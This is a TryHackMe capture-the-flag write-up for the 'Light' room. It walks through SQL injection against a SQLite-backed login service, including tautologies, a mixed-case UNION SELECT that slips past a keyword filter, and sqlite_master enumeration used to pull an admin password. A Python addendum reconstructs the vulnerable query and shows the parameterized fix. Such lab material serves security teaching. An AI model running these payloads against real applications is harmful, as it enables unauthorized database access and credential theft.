Light – TryHackMe CTF writeup

Description

https://tryhackme.com/room/lightroom

Welcome to the Light database application!

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337
You can use the username smokey in order to get started.

Solution

There is an app listening on port 1337.
We are prompted for a username, and in return we receive a password.

To make the rest easier to follow and to copy, I will put the remainder of the solution in a code block below, with # comments explaining each step.

Welcome to the Light database!
# first, as in the room description, we use the username smokey
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
# trying admin
Please enter your username: admin
Username not found.
# trying a single quote to trigger an error
Please enter your username: smokey'
Error: unrecognized token: "'smokey'' LIMIT 30"
# trying to comment out the rest of the query
Please enter your username: ' or username='admin';--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
# the error shows the query ends with ' LIMIT 30, so instead of a comment I close the trailing quote with 'a'='a
Please enter your username: ' OR 1=1 AND 'a'='a
Password: tF8tj2o94WE4LKC
# trying to guess letter by letter
Please enter your username: ' OR username like 'a%' and 1=1 and 'a'='a
Password: tF8tj2o94WE4LKC
# this was not effective, but at least it suggested there is a user alice in the db
# I tried to guess columns:
Please enter your username: ' OR username='alice' AND 1=1 AND 'a'='a
Password: tF8tj2o94WE4LKC
Please enter your username: ' AND length(role)>0 AND username='alice' AND 'a'='a
Error: no such column: role
Please enter your username: ' AND length(is_admin)>0 AND username='alice' AND 'a'='a
Error: no such column: is_admin
# since I guessed it is a SQLite db, I queried the sqlite_master table
# union was blocked, so I tried mixed case as below
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND 'a'='a
Password: admintable
# and checked its CREATE statement (the sql column)
Please enter your username: ' UniOn SeLeCt sql FROM sqlite_master WHERE name='admintable' AND 'a'='a
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
# and looked up the username stored in admintable
Please enter your username: ' UniOn SeLeCt username FROM admintable WHERE 'a'='a
Password: TryHackMeAdmin
# I checked admin user password:
Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username='TryHackMeAdmin' and 'a'='a
Password: mamZtAuMlrsEy5bp6q17
# I checked whether sqlite_master lists another table
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND name != 'admintable' AND 'a'='a
Password: usertable
# I checked for further tables, but it looks like there are only the two already found
Please enter your username: ' UniOn SeLeCt name FROM sqlite_master WHERE type='table' AND name != 'admintable' AND name != 'usertable' AND 'a'='a
Username not found.
# I checked whether admintable has another user; its password was the flag :)
Please enter your username: ' UniOn SeLeCt password FROM admintable WHERE username!='TryHackMeAdmin' and 'a'='a
Password: THM{FLAG_REDACTED}
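As an added example (not part of the writeup or the room's code), the following Python reconstructs the pattern the session above implies: a string-built SQLite query guarded only by a substring blacklist, next to the parameterized form that treats every probe used above as a plain value. The usertable columns, the row values and the exact blacklist are assumptions; only the admintable schema comes from the page.

```python
import sqlite3

# Constructed in-memory database. admintable's schema is the one recovered from
# sqlite_master above; usertable's columns and all row values are made up here.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
        INSERT INTO usertable (username, password)
            VALUES ('smokey', 'constructed-pw-smokey'), ('alice', 'constructed-pw-alice');
        INSERT INTO admintable (username, password)
            VALUES ('TryHackMeAdmin', 'constructed-admin-pw');
    """)
    return con

# Assumed blacklist: the three tokens the app's message names plus a lowercase
# "union", since the writeup reports union as blocked. The real list is unknown.
BLOCKED = ("/*", "--", "%0b", "union")

def lookup_vulnerable(con, username):
    """Query built by string formatting; the blacklist is the only guard."""
    if any(token in username for token in BLOCKED):
        return "blocked"
    sql = f"SELECT password FROM usertable WHERE username = '{username}' LIMIT 30"
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:  # yields "unrecognized token" / "no such column" like the app
        return f"Error: {exc}"
    return row[0] if row else "Username not found."

def lookup_safe(con, username):
    """Same lookup with a bound parameter: the input is data, never parsed as SQL."""
    sql = "SELECT password FROM usertable WHERE username = ? LIMIT 30"
    row = con.execute(sql, (username,)).fetchone()
    return row[0] if row else "Username not found."

if __name__ == "__main__":
    db = build_db()
    for probe in ("smokey", "smokey'", "' OR 1=1 AND 'a'='a",
                  "' union select username FROM admintable WHERE 'a'='a",
                  "' UniOn SeLeCt username FROM admintable WHERE 'a'='a"):
        print(repr(probe))
        print("  vulnerable:", lookup_vulnerable(db, probe))
        print("  safe:      ", lookup_safe(db, probe))
```

The mixed-case UNION slips past the lowercase blacklist and pulls a row out of admintable, while the parameterized query returns "Username not found." for every injected string.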